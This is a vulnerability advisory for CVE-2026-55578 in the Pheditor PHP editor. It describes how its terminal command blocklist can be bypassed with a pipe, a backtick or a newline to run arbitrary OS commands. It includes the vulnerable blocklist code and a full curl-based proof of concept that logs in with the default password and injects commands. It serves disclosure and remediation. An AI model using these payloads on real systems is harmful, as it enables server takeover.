PT-2026-60697 · Packagist · Pheditor/Pheditor

CVE-2026-55578

·

Published

2026-07-16

·

Updated

2026-07-16

CVSS v3.1

8.8

High

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

The terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to shell exec(). After the fix for GHSA-9643-6xjp-vx57 (which added $ to the blocklist), the characters | (single pipe), ` (backtick), and the newline byte (0x0A) remain unblocked. An authenticated user with the terminal permission (enabled by default) can leverage any of these to bypass the TERMINAL COMMANDS allowlist and execute arbitrary OS commands as the web server user.

Details

Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)
Affected version: Pheditor 2.0.1+
The terminal handler receives $ POST['command'] and passes it to shell exec() at pheditor.php:586:
php
$output = shell exec((empty($dir) ? null : 'cd ' . escapeshellarg($dir) . ' && ') . $command . ' && echo ; pwd');
The blocklist at pheditor.php:557 checks for &, ;, ||, and $, but does not block |, `, or newline (0x0A):
php
if (strpos($command, '&') !== false || strpos($command, ';') !== false || strpos($command, '||') !== false || strpos($command, '$') !== false) {
  echo json error("Illegal character(s) in command (& ; ||)
");
  exit;
}
The TERMINAL COMMANDS prefix check at pheditor.php:566-573 only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.
Bypass 1 — Single pipe |: The filter checks for || but not single |. Payload ls | id passes both the blocklist and the whitelist (starts with ls). The shell executes: cd '<dir>' && ls | id && echo ; pwd, running id.
Bypass 2 — Backtick `: Backtick is not in the blocklist. Payload echo `id` passes the blocklist and whitelist (starts with echo). The shell executes id inside backtick substitution.
Bypass 3 — Newline 0x0A: A literal newline byte is not in the blocklist. Payload ls touch /tmp/proof (where is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.

PoC

Environment: Any system running PHP 8.x with pheditor.php deployed and shell exec() enabled.
Setup:
bash
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &
Authenticate (default password admin):
bash
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d "pheditor password=admin" -L > /dev/null
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
Bypass 1 (pipe |):
bash
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php 
 --data-urlencode "action=terminal" 
 --data-urlencode "token=$TOKEN" 
 --data-urlencode "command=ls | id" 
 --data-urlencode "dir="
Expected: {"error":false,"message":"OK","result":"uid=... gid=... ",...}id output proves RCE.
Bypass 2 (backtick):
bash
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php 
 --data-urlencode "action=terminal" 
 --data-urlencode "token=$TOKEN" 
 --data-urlencode 'command=echo `id`' 
 --data-urlencode "dir="
Expected: Same id output in response.
Bypass 3 (newline 0x0A):
bash
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php 
 --data-urlencode "action=terminal" 
 --data-urlencode "token=$TOKEN" 
 --data-urlencode $'command=ls
id' 
 --data-urlencode "dir="
Expected: Same id output in response.
Control (blocked command without bypass):
bash
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php 
 --data-urlencode "action=terminal" 
 --data-urlencode "token=$TOKEN" 
 --data-urlencode "command=whoami" 
 --data-urlencode "dir="
Expected: {"error":true,"message":"Command not allowed..."} — allowlist enforced.
Cleanup:
bash
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt

Impact

OS Command Injection (CWE-78). Any authenticated Pheditor user with the terminal permission (enabled by default) can bypass the TERMINAL COMMANDS allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 — that fix addressed $() substitution but three additional shell metacharacters remain unblocked.
Attacker privileges: Authenticated user (PR:L). Combined with default password admin, effectively PR:N.
Impact: Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).
Suggested remediation: Parse the command into executable + arguments, validate the executable against TERMINAL COMMANDS with exact match, pass each argument through escapeshellarg(), or use proc open() with an argument array to avoid shell interpretation entirely.

Fix

OS Command Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-55578
GHSA-WG4W-WR5Q-6VJC

Affected Products

Pheditor/Pheditor